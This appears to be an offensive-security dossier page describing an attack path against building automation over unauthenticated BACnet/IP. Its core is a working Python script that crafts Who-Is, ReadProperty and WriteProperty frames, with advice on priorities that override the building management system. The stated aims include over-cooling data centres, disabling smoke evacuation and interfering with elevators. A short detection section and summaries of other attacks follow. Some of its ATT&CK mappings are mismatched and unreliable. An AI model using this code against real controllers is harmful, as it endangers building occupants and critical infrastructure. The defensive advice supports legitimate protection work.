BACnet HVAC → disrupt building operations
BACnet/IP on UDP/47808 (0xBAC0) has no authentication in the base protocol: any host that can reach a controller can read and write its properties. From a foothold in corporate IT, write to HVAC controllers: over-cool a data centre, disable smoke evacuation, mess with elevators.
§ Context
Assumed environment: the target's BMS (Building Management System) shares a network with corporate IT (extremely common), and the BACnet devices on the building-automation subnet accept WriteProperty without authentication.
§ Steps
- 01  Scan UDP/47808 across building VLAN  (Discovery)  N-NMAP-INTERNAL: Internal Nmap Sweep
- 02  BACnet WhoIs / I-Am enumeration  (Discovery)  T1087: Account Discovery
- 03  ReadProperty across controllers  (Credential Access)  T1040: Network Sniffing
- 04  WriteProperty to setpoints / overrides  (Impact)  OT-BACNET: BACnet Building Automation Write
- 05  Disrupt HVAC / elevators / smoke evac  (Impact)  T1486: Data Encrypted for Impact
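The Who-Is / I-Am, ReadProperty and WriteProperty steps above, as an added example that is not code from this dossier or from any BACnet project: it hand-builds the raw BACnet/IP frames (BVLC + NPDU + APDU) so that the absence of any credential field is visible, and parses an I-Am reply. Object type, property and service numbers are from the BACnet standard; the device instance 1234, vendor id 15 and the sample I-Am bytes are constructed test data. The `service_of` helper is the same decode a defender would run over a UDP/47808 capture to spot WriteProperty from hosts that are not the BMS server (see the detection question under "Frequently asked").

```python
import struct

BVLC_UNICAST, BVLC_BROADCAST = 0x0A, 0x0B            # BVLC function codes
OBJ_ANALOG_VALUE, OBJ_DEVICE = 2, 8                  # BACnet object types
PROP_PRESENT_VALUE = 85                              # BACnet property identifier
SVC_WHO_IS, SVC_I_AM = 0x08, 0x00                    # unconfirmed service choices
SVC_READ_PROPERTY, SVC_WRITE_PROPERTY = 0x0C, 0x0F   # confirmed service choices


def object_id(obj_type, instance):
    """Object identifier: 10-bit type, 22-bit instance, big-endian."""
    return struct.pack(">I", (obj_type << 22) | instance)


def ctx_tag(num, payload):
    """Context-specific tag (class bit 0x08); payloads here are <= 4 bytes."""
    return bytes([(num << 4) | 0x08 | len(payload)]) + payload


def bvlc(function, body):
    """BACnet/IP link-layer header: 0x81, function, total length incl. header."""
    return bytes([0x81, function]) + struct.pack(">H", 4 + len(body)) + body


def who_is():
    """Global-broadcast Who-Is (NPDU DNET 0xFFFF, hop count 0xFF); no arguments."""
    npdu = bytes([0x01, 0x20, 0xFF, 0xFF, 0x00, 0xFF])
    return bvlc(BVLC_BROADCAST, npdu + bytes([0x10, SVC_WHO_IS]))


def read_property(invoke_id, obj_type, instance, prop):
    """Confirmed-Request ReadProperty; NPDU control 0x04 = expecting reply."""
    apdu = bytes([0x00, 0x05, invoke_id, SVC_READ_PROPERTY])
    apdu += ctx_tag(0, object_id(obj_type, instance)) + ctx_tag(1, bytes([prop]))
    return bvlc(BVLC_UNICAST, bytes([0x01, 0x04]) + apdu)


def write_property_real(invoke_id, obj_type, instance, prop, value, priority):
    """Confirmed-Request WriteProperty of a REAL at priority 1..16.
    The only 'gate' is the priority array; no credential travels in the frame."""
    apdu = bytes([0x00, 0x05, invoke_id, SVC_WRITE_PROPERTY])
    apdu += ctx_tag(0, object_id(obj_type, instance)) + ctx_tag(1, bytes([prop]))
    apdu += b"\x3e\x44" + struct.pack(">f", value) + b"\x3f"   # [3] REAL [/3]
    apdu += ctx_tag(4, bytes([priority]))
    return bvlc(BVLC_UNICAST, bytes([0x01, 0x04]) + apdu)


def _apdu_offset(frame):
    """Skip BVLC (4 bytes) and the variable-length NPDU; return APDU start."""
    control, i = frame[5], 6
    if control & 0x20:                       # DNET, DLEN, DADR present
        i += 3 + frame[i + 2]
    if control & 0x08:                       # SNET, SLEN, SADR present
        i += 3 + frame[i + 2]
    if control & 0x20:                       # hop count follows the specifiers
        i += 1
    return i


def service_of(frame):
    """Return ('confirmed'|'unconfirmed', service choice) for a frame."""
    i = _apdu_offset(frame)
    pdu_type = frame[i] >> 4
    if pdu_type == 0:
        return "confirmed", frame[i + 3]
    if pdu_type == 1:
        return "unconfirmed", frame[i + 1]
    return "other", None


def _app_tags(data):
    """Yield (tag number, payload) for application-tagged primitive values."""
    i = 0
    while i < len(data):
        tag, lvt = data[i] >> 4, data[i] & 0x07
        i += 1
        if lvt == 5:                         # extended length in the next byte
            lvt, i = data[i], i + 1
        yield tag, data[i:i + lvt]
        i += lvt


def decode_i_am(frame):
    """Parse an I-Am reply into its four fields; None if not an I-Am."""
    if frame[0] != 0x81 or struct.unpack(">H", frame[2:4])[0] != len(frame):
        return None
    if service_of(frame) != ("unconfirmed", SVC_I_AM):
        return None
    fields = list(_app_tags(frame[_apdu_offset(frame) + 2:]))
    oid = struct.unpack(">I", fields[0][1])[0]
    return {
        "object_type": oid >> 22,
        "device_instance": oid & 0x3FFFFF,
        "max_apdu": int.from_bytes(fields[1][1], "big"),
        "segmentation": fields[2][1][0],
        "vendor_id": int.from_bytes(fields[3][1], "big"),
    }


# Constructed I-Am from a hypothetical device instance 1234 (not a real capture).
SAMPLE_I_AM = bytes.fromhex("810b00140100" "1000" "c4020004d2" "2205c4" "9103" "210f")

if __name__ == "__main__":
    print("Who-Is        :", who_is().hex())
    print("ReadProperty  :", read_property(1, OBJ_ANALOG_VALUE, 1, PROP_PRESENT_VALUE).hex())
    print("WriteProperty :", write_property_real(2, OBJ_ANALOG_VALUE, 1, PROP_PRESENT_VALUE, 12.0, 8).hex())
    print("I-Am decoded  :", decode_i_am(SAMPLE_I_AM))
```

Sending `who_is()` to the subnet broadcast on UDP/47808 and feeding each reply to `decode_i_am` gives the device inventory; `read_property` and `write_property_real` are unicast to the controller's IP. The write example uses priority 8 (manual operator); a lower number outranks the BMS's own commands and stays in effect until something relinquishes that slot.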
§ References
- T1486  Data Encrypted for Impact
- T1087  Account Discovery
- T1040  Network Sniffing
§ Frequently asked
- What is the "BACnet HVAC → disrupt building operations" attack path?
- BACnet/IP on UDP/47808 carries no authentication. From a foothold in corporate IT with reachability to the building-automation subnet, an attacker enumerates controllers with Who-Is / I-Am, reads their points with ReadProperty, and writes setpoints and overrides with WriteProperty: over-cool a data centre, disable smoke evacuation, interfere with elevators. It chains 5 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- A foothold on a corporate IT host that can reach the BMS (Building Management System) subnet, which in the assumed environment is shared with corporate IT (extremely common). No BMS credentials are needed: the controllers accept WriteProperty without auth.
- What is the final impact of this kill-chain?
- Disruption of building operations through writes to HVAC and related controllers: altered setpoints that over-cool a data centre, disabled smoke-evacuation sequences, interference with elevator control. A WriteProperty at a high priority (1 is highest, 16 lowest) outranks the BMS's own commands in the controller's priority array, so the override persists until an operator relinquishes that priority slot.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step; each linked MITRE ATT&CK entry under "References" lists defensive controls, detection telemetry, and known threat-actor usage. BACnet-specific signals: Who-Is broadcasts and confirmed requests (ReadProperty, WriteProperty) on UDP/47808 from any host that is not a known BMS server or engineering workstation, and WriteProperty requests at priorities the BMS never uses. Prevention is mainly segmentation: keep the building-automation subnet off the corporate IT network, filter UDP/47808 at the boundary, and use BACnet/SC (TLS-secured BACnet) where the controllers support it.
§ Related dossiers
- Reachable Modbus PLC → direct register override (shared techniques: 4)
  Modbus has no authentication. From a foothold on a reachable OT network, write to coils / holding registers directly with pymodbus.
- Stolen credentials → no-MFA Snowflake → mass tenant exfil (2024) (shared techniques: 2)
  Infostealer logs from third-party machines yielded credentials for many Snowflake tenants. Tenants without enforced MFA / IP allow-lists were directly queried; dozens of customer data sets exfiltrated.
- Unauth DICOM PACS → mass medical-image exfil (shared techniques: 2)
  PACS server accepts unauthenticated C-FIND / C-MOVE on port 104 / 11112. Query for every study, pull every image: exfil hundreds of thousands of patient scans + DICOM metadata (PII).
- LoRaWAN replay → spoof environmental sensor (shared techniques: 2)
  Capture LoRaWAN uplinks from a target sensor. Devices that reset FCnt on reboot accept replayed frames; feed false readings into the upstream IoT platform.
- z/OS TN3270 → RACF userID brute → mainframe shell (shared techniques: 2)
  Internet-/intranet-exposed TN3270 mainframe terminal. Userids follow a predictable HR scheme. Brute-force passwords; many environments allow short / dictionary passwords for legacy reasons.
- vCenter pre-auth RCE → root on every ESXi → mass encrypt (shared techniques: 2)
  Pre-auth RCE on vCenter Server (DCERPC or vSphere Client class CVE). Deploy an SSH key via vCenter to every managed ESXi, then mass-encrypt every .vmdk: the ESXiArgs / Black Basta playbook.